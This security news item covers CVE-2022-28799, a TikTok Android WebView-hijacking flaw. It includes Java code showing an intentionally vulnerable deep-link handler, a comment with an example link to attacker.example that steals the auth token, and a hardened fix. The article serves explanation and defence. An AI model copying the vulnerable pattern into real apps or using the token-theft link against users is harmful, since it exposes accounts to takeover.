A high-severity flaw in the TikTok Android app allowed attackers to take over accounts with a single click. The flaw, discovered in February, is exploited by tricking the targeted victim into clicking a malicious link.

Diving into details

According to Microsoft, an attacker could abuse the flaw, identified as CVE-2022-28799, to hijack users' accounts and gain access to their sensitive information.
  • Clicking the malicious link loads an attacker-controlled page in the app's WebView, which exposed 70 native methods through its JavaScript interface; the attacker's page can call those methods to hijack the WebView component of the TikTok app.
  • With that access, an attacker can modify the user's TikTok profile and sensitive information and act on the user's behalf: sending messages, publishing private videos, and uploading videos.
  • The attacker can also retrieve the user's authentication tokens by triggering a request to a server under their control and logging the cookies and request headers the app sends with it.

About the flaw

The flaw is a WebView hijacking vulnerability in the TikTok Android application: a crafted deep link carried an unsanitized URL parameter that the app loaded into its WebView without validating it, so the WebView could be forced to load an arbitrary website.
  • Because a JavaScript interface is attached to that WebView, the loaded page can call the app's native methods, which is what turns the open redirect into account hijacking.
  • The vulnerability is patched in TikTok version 23.7.3 and later.
  • Researchers have not yet found evidence of CVE-2022-28799 being exploited in the wild.
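The pattern described above, as an added illustration that is not TikTok's code or Microsoft's proof of concept: a deep-link handler that loads a URL taken from a link parameter into a WebView with a JavaScript interface attached (the vulnerable form), beside a hardened version that allow-lists the destination and re-checks every navigation. All names here (the `url` parameter, `NativeBridge`, `ALLOWED_HOSTS`, the `myapp://` scheme and example hosts) are assumptions.

```java
// Added illustration (not TikTok's code): the deep-link-to-WebView pattern
// behind CVE-2022-28799, shown in its vulnerable form and then hardened.
// Names ("url" parameter, NativeBridge, ALLOWED_HOSTS, myapp://) are assumptions.
import android.net.Uri;
import android.webkit.JavascriptInterface;
import android.webkit.WebResourceRequest;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public final class DeepLinkWebView {

    // Native methods exposed to page JavaScript. Everything annotated here is
    // callable by whatever page the WebView loads, so the page origin must be trusted.
    static final class NativeBridge {
        private final String sessionToken;
        NativeBridge(String sessionToken) { this.sessionToken = sessionToken; }

        @JavascriptInterface
        public String getAuthToken() { return sessionToken; }   // sensitive
    }

    // VULNERABLE: the target URL comes straight from the deep link and is
    // loaded with the bridge attached. A link such as
    //   myapp://open?url=https://attacker.example/steal.html
    // makes the WebView load the attacker's page, which can then call
    // window.bridge.getAuthToken() and send the result to attacker.example.
    static void loadVulnerable(WebView webView, Uri deepLink, String sessionToken) {
        String target = deepLink.getQueryParameter("url");   // unsanitized parameter
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new NativeBridge(sessionToken), "bridge");
        webView.loadUrl(target);                              // unvalidated deep link
    }

    // HARDENED: strict scheme + exact-host allow-list, applied to the initial
    // URL and to every later navigation, so a redirect or link on an allowed
    // host cannot carry the bridge to an attacker's origin.
    static final Set<String> ALLOWED_HOSTS =           // assumption: app-owned hosts
            new HashSet<>(Arrays.asList("m.example.com", "www.example.com"));

    static boolean isAllowed(Uri uri) {
        if (uri == null) return false;
        if (!"https".equalsIgnoreCase(uri.getScheme())) return false;
        String host = uri.getHost();
        if (host == null || host.isEmpty()) return false;
        // Exact match only: no suffix/contains checks, so "evil-example.com"
        // or "m.example.com.attacker.example" are rejected.
        return ALLOWED_HOSTS.contains(host.toLowerCase());
    }

    static void loadHardened(WebView webView, Uri deepLink, String sessionToken) {
        String target = deepLink.getQueryParameter("url");
        Uri parsed = (target == null) ? null : Uri.parse(target);
        if (!isAllowed(parsed)) {
            return;   // reject the deep link; caller shows an in-app default page
        }
        webView.getSettings().setJavaScriptEnabled(true);
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                // Returning true blocks the navigation; anything off the
                // allow-list (including redirects) never loads with the bridge.
                return !isAllowed(request.getUrl());
            }
        });
        webView.addJavascriptInterface(new NativeBridge(sessionToken), "bridge");
        webView.loadUrl(parsed.toString());
    }
}
```

The `WebResourceRequest` overload of `shouldOverrideUrlLoading` requires API level 24; on older targets override the `String` variant and parse it with `Uri.parse` before calling `isAllowed`. The stronger fix is to not attach the bridge at all to any WebView that can be reached from a deep link, and to keep sensitive methods such as `getAuthToken` out of any JavaScript interface regardless of allow-listing.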

What to do?

TikTok has over a billion downloads, which makes it an attractive target for attackers. To stay protected, users should update the app to version 23.7.3 or later, avoid clicking links from untrusted sources, install apps only from official app stores, and report any unusual app behavior as soon as possible.
Cyware Publisher